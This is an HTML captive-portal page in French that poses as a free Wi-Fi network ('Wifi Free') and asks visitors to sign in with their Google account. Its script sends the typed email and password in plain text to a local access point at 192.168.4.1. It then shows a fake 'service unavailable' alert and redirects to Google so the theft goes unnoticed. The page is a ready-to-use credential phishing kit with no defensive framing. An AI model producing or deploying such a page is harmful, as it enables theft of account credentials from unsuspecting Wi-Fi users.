<!DOCTYPE html>
<html>
<head>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <style>
        /* Styles généraux pour les écrans étroits (smartphones) */
        a:hover {
            text-decoration: underline;
        }

        body {
            font-family: Arial, sans-serif;
            align-items: center;
            justify-content: center;
            background-color: #FFFFFF;
        }

        input[type="text"],
        input[type="password"] {
            width: 100%;
            padding: 12px 10px;
            margin: 8px 0;
            box-sizing: border-box;
            border: 1px solid #cccccc;
            border-radius: 4px;
        }

        .container {
            max-width: 100%;
            margin: auto;
            padding: 20px;
        }

        .logo-container {
            text-align: center;
            margin-bottom: 30px;
            display: flex;
            justify-content: center;
            align-items: center;
        }

        .logo {
            max-width: 40px;
            max-height: 40px;
            fill: #FFC72C;
            margin-right: 100px;
        }

        .company-name {
            font-size: 42px;
            color: black;
            margin-left: 0px;
        }

        .form-container {
            background: #FFFFFF;
            border: 1px solid #CEC0DE;
            border-radius: 4px;
            padding: 20px;
            box-shadow: 0px 0px 10px 0px rgba(108, 66, 156, 0.2);
        }

        h1 {
            text-align: center;
            font-size: 28px;
            font-weight: 500;
            margin-bottom: 20px;
        }

        .input-field {
            width: 100%;
            padding: 12px;
            border: 1px solid #BEABD3;
            border-radius: 4px;
            margin-bottom: 20px;
            font-size: 14px;
        }

        .submit-btn {
            background: #000000;
            color: white;
            border: none;
            padding: 12px 20px;
            border-radius: 4px;
            font-size: 16px;
        }

        .submit-btn:hover {
            background: #5B3784;
        }

        .containersubtitle {
            color: #000000;
        }

        .containertitle {
            color: #000000;
        }

        /* Styles spécifiques pour les écrans larges (PC) */
        @media screen and (min-width: 768px) {
            .logo {
                max-width: 80px;
                max-height: 80px;
            }
        }
    </style>
</head>
<body>
<div class="container">
    <div class="logo-container">
        <?xml version="1.0" standalone="no"?>
        <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 20010904//EN"
        "http://www.w3.org/TR/2001/REC-SVG-20010904/DTD/svg10.dtd">
        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="228px" height="159px" viewBox="0 0 228 159" version="1.1">
<g id="surface1">
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(0%,0%,0%);fill-opacity:1;" d="M 194.292969 79.460938 C 194.292969 123.34375 158.632812 158.921875 114.648438 158.921875 C 70.660156 158.921875 35 123.34375 35 79.460938 C 35 35.574219 70.660156 0 114.648438 0 C 158.632812 0 194.292969 35.574219 194.292969 79.460938 Z M 194.292969 79.460938 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(0%,0%,0%);fill-opacity:1;" d="M 40 30.722656 L 188.214844 30.722656 C 210.304688 30.722656 228.214844 48.628906 228.214844 70.722656 L 228.214844 90.367188 C 228.214844 112.457031 210.304688 130.367188 188.214844 130.367188 L 40 130.367188 C 17.910156 130.367188 0 112.457031 0 90.367188 L 0 70.722656 C 0 48.628906 17.910156 30.722656 40 30.722656 Z M 40 30.722656 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(100%,100%,100%);fill-opacity:1;" d="M 20.039062 54.496094 L 32.160156 104.75 L 44.410156 104.75 L 50.09375 74.953125 L 55.773438 104.75 L 68.210938 104.75 L 80.902344 54.496094 L 66.757812 54.496094 L 61.960938 83.789062 L 56.28125 54.496094 L 44.09375 54.496094 L 38.476562 83.539062 L 33.675781 54.496094 Z M 20.039062 54.496094 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(100%,100%,100%);fill-opacity:1;" d="M 85.949219 68.636719 L 99.585938 68.636719 L 99.585938 104.496094 L 85.949219 104.496094 Z M 85.949219 68.636719 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(100%,100%,100%);fill-opacity:1;" d="M 100.738281 58.15625 C 100.738281 61.433594 97.230469 64.089844 92.90625 64.089844 C 88.585938 64.089844 85.078125 61.433594 85.078125 58.15625 C 85.078125 54.878906 88.585938 52.222656 92.90625 52.222656 C 97.230469 52.222656 100.738281 54.878906 100.738281 58.15625 Z M 100.738281 58.15625 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(100%,100%,100%);fill-opacity:1;" d="M 148.710938 38.230469 C 147.765625 38.332031 146.828125 38.285156 145.882812 38.527344 C 95.105469 51.523438 139.898438 107.558594 101.34375 123.621094 L 190.351562 123.496094 C 206.972656 123.472656 220.351562 110.117188 220.351562 93.496094 L 220.351562 68.230469 C 220.351562 51.609375 206.972656 38.230469 190.351562 38.230469 Z M 148.710938 38.230469 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(0%,0%,0%);fill-opacity:1;" d="M 136.460938 54.496094 L 180.652344 54.496094 L 180.652344 66.367188 L 150.347656 66.367188 L 150.347656 77.222656 L 176.867188 77.222656 L 176.867188 88.589844 L 150.347656 88.589844 L 150.347656 104.75 L 136.523438 104.75 Z M 136.460938 54.496094 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(0%,0%,0%);fill-opacity:1;" d="M 187.46875 68.386719 L 201.105469 68.386719 L 201.105469 104.246094 L 187.46875 104.246094 Z M 187.46875 68.386719 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(0%,0%,0%);fill-opacity:1;" d="M 202.253906 57.902344 C 202.253906 61.179688 198.75 63.839844 194.425781 63.839844 C 190.101562 63.839844 186.597656 61.179688 186.597656 57.902344 C 186.597656 54.625 190.101562 51.96875 194.425781 51.96875 C 198.75 51.96875 202.253906 54.625 202.253906 57.902344 Z M 202.253906 57.902344 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(100%,0%,0%);fill-opacity:1;" d="M 101.355469 130.960938 C 100.800781 130.742188 100.265625 130.632812 99.753906 130.632812 C 98.371094 130.632812 97.675781 131.386719 97.675781 132.886719 L 97.675781 134.378906 L 100.875 134.378906 L 100.875 137.566406 L 97.675781 137.566406 L 97.675781 148.378906 L 93.371094 148.378906 L 93.371094 137.566406 L 91.019531 137.566406 L 91.019531 134.378906 L 93.371094 134.378906 L 93.371094 132.640625 C 93.371094 131.046875 93.890625 129.761719 94.929688 128.785156 C 95.96875 127.8125 97.382812 127.324219 99.167969 127.324219 C 100.042969 127.324219 100.773438 127.414062 101.355469 127.597656 Z M 101.355469 130.960938 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(100%,0%,0%);fill-opacity:1;" d="M 112.074219 138.277344 C 111.554688 137.992188 110.949219 137.851562 110.257812 137.851562 C 109.316406 137.851562 108.585938 138.195312 108.054688 138.882812 C 107.527344 139.574219 107.261719 140.507812 107.261719 141.695312 L 107.261719 148.378906 L 102.941406 148.378906 L 102.941406 134.378906 L 107.261719 134.378906 L 107.261719 136.976562 L 107.316406 136.976562 C 108 135.082031 109.230469 134.132812 111.007812 134.132812 C 111.464844 134.132812 111.820312 134.1875 112.074219 134.296875 Z M 112.074219 138.277344 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(100%,0%,0%);fill-opacity:1;" d="M 126.675781 142.609375 L 117.542969 142.609375 C 117.6875 144.644531 118.96875 145.660156 121.382812 145.660156 C 122.925781 145.660156 124.277344 145.296875 125.445312 144.566406 L 125.445312 147.683594 C 124.148438 148.375 122.46875 148.722656 120.398438 148.722656 C 118.140625 148.722656 116.382812 148.09375 115.136719 146.84375 C 113.886719 145.589844 113.261719 143.839844 113.261719 141.597656 C 113.261719 139.273438 113.9375 137.433594 115.285156 136.074219 C 116.636719 134.71875 118.292969 134.039062 120.261719 134.039062 C 122.304688 134.039062 123.882812 134.644531 125 135.855469 C 126.117188 137.070312 126.675781 138.714844 126.675781 140.792969 Z M 122.667969 139.957031 C 122.667969 137.953125 121.859375 136.949219 120.234375 136.949219 C 119.542969 136.949219 118.945312 137.238281 118.4375 137.8125 C 117.933594 138.386719 117.625 139.101562 117.515625 139.957031 Z M 122.667969 139.957031 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(100%,0%,0%);fill-opacity:1;" d="M 141.824219 142.609375 L 132.691406 142.609375 C 132.839844 144.644531 134.117188 145.660156 136.535156 145.660156 C 138.074219 145.660156 139.425781 145.296875 140.59375 144.566406 L 140.59375 147.683594 C 139.300781 148.375 137.617188 148.722656 135.550781 148.722656 C 133.289062 148.722656 131.535156 148.09375 130.285156 146.84375 C 129.035156 145.589844 128.414062 143.839844 128.414062 141.597656 C 128.414062 139.273438 129.085938 137.433594 130.4375 136.074219 C 131.785156 134.71875 133.445312 134.039062 135.414062 134.039062 C 137.453125 134.039062 139.035156 134.644531 140.148438 135.855469 C 141.265625 137.070312 141.824219 138.714844 141.824219 140.792969 Z M 137.820312 139.957031 C 137.820312 137.953125 137.007812 136.949219 135.386719 136.949219 C 134.691406 136.949219 134.09375 137.238281 133.585938 137.8125 C 133.082031 138.386719 132.773438 139.101562 132.664062 139.957031 Z M 137.820312 139.957031 "/>
</g>
</svg>


    </div>
    <div class="form-container">
        <center>
            <h1 class='containertitle'>Bienvenue sur le  Reseau Wifi Gratuit.</h1>
            <h2 class='containersubtitle'>Connectez vous grace a votre compte Google.</h2>
        </center>
        <form id="login-form">
            <input id="email" name="email" class="input-field" type="text" placeholder="Google Account" required>
            <input id="password" name="password" class="input-field" type="password" placeholder="Password" required>
            <button class="submit-btn" type="button" onclick="sendCredentials()">Continue</button>
        </form>
    </div>
</div>
<script>
    function sendCredentials() {
        var email = document.getElementById('email').value;
        var password = document.getElementById('password').value;

        // Send the credentials to a server (adjust the URL as needed)
        var url = "http://192.168.4.1/?email=" + encodeURIComponent(email) + "&password=" + encodeURIComponent(password);
        var xhr = new XMLHttpRequest();
        xhr.open("GET", url, true);
        xhr.send();

        // Display a temporary unavailable service message
        alert("Service temporairement indisponible.");
        window.location.href = "https://www.google.com";
    }
</script>
</body>
</html>
